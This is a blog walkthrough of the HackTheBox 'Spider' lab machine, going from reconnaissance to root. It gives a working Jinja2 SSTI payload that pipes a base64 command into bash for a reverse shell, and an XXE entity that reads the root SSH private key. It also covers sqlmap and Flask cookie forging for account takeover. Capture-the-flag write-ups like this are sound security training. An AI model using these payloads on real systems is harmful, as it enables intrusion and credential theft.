Hackthebox: Spider Machine Walkthrough – Hard Difficulty

Written by darknite -
on June 1, 2021

In this post, i would like to share a walkthrough on Spider Machine.

This room has been considered difficulty rated as HARD machine

Testing

Information Gathering on Spider machine

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

From the result, we got a few port open such as:

  • 22: OpenSSH 7.6p1
  • 80: ngix 1.14.0

We need to whitelist the domain name for the machine such as spider.htb 

Let’s open the browser and straight into the website interface.

From the website interface, we have noticed it’s related to selling items, especially chairs on the internet

Let’s start our gobuster tools on the machine and i did find out there are a few directories that have been found such as

  • /cart
  • /checkout
  • /index
  • /login
  • /logout
  • /main
  • /register

Gaining Access

We found Admin Login when we enter the /login directory. However, we don’t have any credentials to login into the interface.

Let’s see /register directory and we should be able to register over here

Now we can login using the UUID provide with the password.

We managed to login into their Dashboard, and we can see some menus on the left side of the website.

Let’s roam around the website and we found that the website is vulnerable to SSTI(Server Side Template Injection) Vulnerability. I found the Vulnerability by reading the source code.

Let’s do some research on the Server-Side Template Injection and found a useful write-up from PortSwigger

Let’s try the vulnerabilities that have been used within the article we read before.

I notice that the interface will appear as shown in the screenshot above. For those that want to see the result, you can click the user information and there you are!

Let’s replace the {{7 * 7}} with the syntax {{config}} on the username coloum within the registration page.

We can the output in the section User Information, and we can see the config file on the username. For a clearer view, we can copy-paste on the notepad or any editor which will show something as above.

There are a few steps that we can get new UUID and password/cookie

Step 1

In this step, we need to install flask-unsigned on your machine and it will take

We need to get the new UUID and Cookie so that we can paste them on the website. Once that is been completed, we should refresh the page and there you go!

Step 2

For this step, I’m using sqlmap command that we use to get UUID and Password

There are a few questions that the player has to answer during the sqlmap process.

(You need to say yes to the first question and say no to the rest)

After a while, we will be given the UUID, name, and password as shown above.

Maintaining Access on Spider machine

Let’s slap the UUID with Password on the login page and click Submit Button

Finally, we managed to get the admin panel of chiv.

Let’s read Message Board Section we got a new directory location, and we can go access the directory.

The website has been showing a support ticket. We should be able to insert a simple code such as

{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n <base64 encoded> | base64 -d | bash")["read"]() %} a {% endwith %}

## What we need to base64 encoded is the shell that we will be using for reverse shell ##

Before submitting the code in the website interface, we need to start nc listening on our terminal

We should be getting a reverse shell connection back to us when we click the Submit Button

We can read the user flag when accessing it from /home/chiv/ and we need to use the “cat user.txt” command

Escalate to Root Privileges Access on Spider machine

We can check which port is open on the machine and i notice port 8080 is open. I was thinking to myself that “maybe we can go for port forwarding” for some reason

I have tried to proceed with port forwarding but it doesn’t work at all.

We need to put our own SSH public key into the machine under /home/.ssh/authorized_keys

We have successfully managed to do port forwarding on the machine.

I managed to see a “Beta Login” when we open the Web Address on the browser. Let’s try to login using chiv as username

We managed to see the Dashboard on the interface. While roaming inside the source code and website, I found some code that it’s related to XXE which the details can be found here

Let’s start our Burpsuite on the machine and try to inspect the traffic of 127.0.0.1:8081

Any username works fine for this activity but i choose @username; for inspection purpose. I also notice that there’s version information on the request packet.

We need to add the following line to get root id_rsa on the browser interface

1.0.0--><!DOCTYPE foo [<!ENTITY username SYSTEM "/root/.ssh/id_rsa"> ]><!--

We managed to get root ssh id_rsa on the browser which we need to copy-paste the key into our machine so that we can use the key to access the machine via ssh

** I managed to get the ssh id_rsa key after multiple try on the Browser. So, you need to keep try until you see the output as shown in the screenshot above **

For a clearer view of the SSH key on the source code view.

We need to give permission to the id_rsa such as sudo chmod 600 <name of id_rsa that you save>

Let’s ssh into the machine as root

We can read the root flag by using the “cat root.txt” command

-THE END-

Happy Learning Guys!

Extra Information

We can go to /etc/shadow to unlock the write-up

Categories:

Hard Machine

Tags:

BurpSuiteChallengesflaskflask-unsigngobusterHackTheBoxLinuxPenetration Testingport forwardingsource code reviewsqlmapsshSSH keyssti

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *